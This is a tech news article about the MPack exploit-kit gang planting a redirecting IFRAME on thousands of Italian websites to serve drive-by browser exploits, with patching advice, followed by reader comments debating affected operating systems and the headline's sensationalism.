Russian hackers hijack Italian sites to serve exploits
Summary: The Russian crime ring behind the infamous WebAttacker/MPack exploit toolkit hacked into thousands of Italian Web sites over the weekend and used a one-line snippet of code to redirect surfers to a server rigged with drive-by exploits.
The Russian crime ring behind the infamous WebAttacker/MPack exploit toolkit hacked into thousands of Italian Web sites over the weekend and used a one-line snippet of code to redirect surfers to a server rigged with drive-by exploits.
The ongoing attacks, which is reminiscent of the Dolphin Stadium site breach in February, uses a malicious IFRAME tag embedded into the hacked site to handle the redirection to the malware-laden server.
Around midday today, the server hosting the exploits was live and anti-virus researchers tracking the attacks have found more than 8,000 hijacked Italian Web sites.
The sites at risk cover a wide range of Internet interests -- from cars and racing (likely to take advantage of the formula one weekend), hotels, sports, music, lottery and pornography were all victims. Even web sites connected to Jon Bon Jovi and Mother Teresa weren’t spared, according to virus researchers at Trend Micro.
Here's a diagram of the attack scenario from Trend Micro's Carolyn Guevarra:
The MPack exploit kit used in this attacks contain a stats counter that spell out in detail the types of exploits used, the number of compromised computers and types of browsers used by the victim (see screenshot above). In this case, it is clear that some newer exploit modules have been added to take aim at flaws in Firefox, Opera and even Apple's QuickTime media player.
Symantec's Elia Floria provides a glimpse at the statistics:
The list of compromised sites is huge and from Mpack statistics this attack is working efficiently (the statistic page reports 65K unique visitors with almost 7K exploited browsers).
It is important to note that the exploits are targeting vulnerabilities that have already been patched so the best defense is to ensure that your machine is fully patched (OS and applications running on top).
Secunia's free software inspector is a nice place to start scanning your machine to look for weak spots. This tool will detect insecure versions of applications installed, verify that all Microsoft patches are applied and assist you in updating your system and applications .
Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.
Talkback
No mention of OS involved......
It would have been more telling if the OS involved was listed though.
That you want or need to be told that...
I'll leave it up to you to figure out what "a lot" means.
Good luck.
Looks like all OS have been targeted.
Statistically, IE would be most targeted and exploited since more lusers use it.
not my understanding...windows only....
of course what the compromised server were running is an entirely different story...most likely apache and linux...but perhaps these were also win/iis. anyone know?
My understanding is , that Windows is being exploited .
Your understanding is nil.
Is that your best takes .
"end of summer" threat?
"It is important to note that the exploits are targeting vulnerabilities that have already been patched."
The news here really is the server hacks.
OSX has been owned
Message has been deleted.
wow, your facts are soooo......made up!
um...the flaw was patched before any wild exploit, so any mac with an internet connection would have been updated automatically and not affected. where did you find your numbers? link?
my macs, just like my pc's and linux boxes, do have anti-virus, outbound application filtering, firewalls, etc. no matter the os, i don't run with scissors and always wear protection. Better safe then sorry, plus coming from a highly redmond centric background I'm used to having to crank down the security to visit the more interesting places on the net.
the mpack quicktime exploit is for win...sorry.
Where are your facts Zealot ?
What would *realy* help...
Some of us would like to program our firewalls and HOSTS files to keep from being redirected to the sh[patch]trap.
Third octet
39
Be careful out there.
_ryan
239
_ryan
important story, but sensationalism ruins it
however, the articles good info is [b][i]utterly ruined[/i][/b] by ryan naraine's sensationalist headline and chicken little crying forth, [b]OHMIGAWD! IT'S ALL THE RUSSIAN MOB!!![/b]. puh-leez.
the truth, and naraine should well know this and report it as such, the mpack exploit tool kit may have originated with russian hackers and/or mob ties, but the truth is this tool kit can be sold to [b][i]anyone[/i][/b] in the world who could have hacked these italian tourism web sites.
the truth is, and naraine knows this also, the fbi and foreign police agencies like interpol do [b][i]not[/i][/b] know yet who specifically hacked these thousands of italian tourism web sites, only that they probably purchased the mpack tool kit from the russians to do it.
the reuters article on this is far more sober and even handed, and gives users the info they really need to avoid being infected ?
http://www.reuters.com/article/internetNews/idUSN1838812020070618
and yes, for those wondering what OS, it is windows, and an older exploit in i.e. that is the vulnerability. updating all your windows security and i.e., as well as all your anti-virus defs. and tools is highly recommended. also, avoid booking that italian dream vacation for a little bit, at least until all those sites have been taken down, cleaned and protected. ;o)
that, or use firefox or apple's safari for windows for your web browsing. or just use a mac or linux in general. ;o)))
[b][i]this[/i][/b] is the kind of non-sensationalist, but basic nuts and bolts good information based on the facts that users really need to read. not the fact that naraine has some sort of hard-on for blaming things on the russian mob when the truth is the fbi and other foreign police agencies still don't know who really pulled off this "italian job." whomever is naraine's editor should really call him to task for trying to garner more web hits through needless sensationalism when he [b][i]knows[/i][/b] those are not the facts as of yet.
Hang on a minute.
Erm...
I can't believe how offended No_Axe & NonZealot have become over this .
"In a world without walls & fences , who needs windows & gates."
Huh?
Plonk.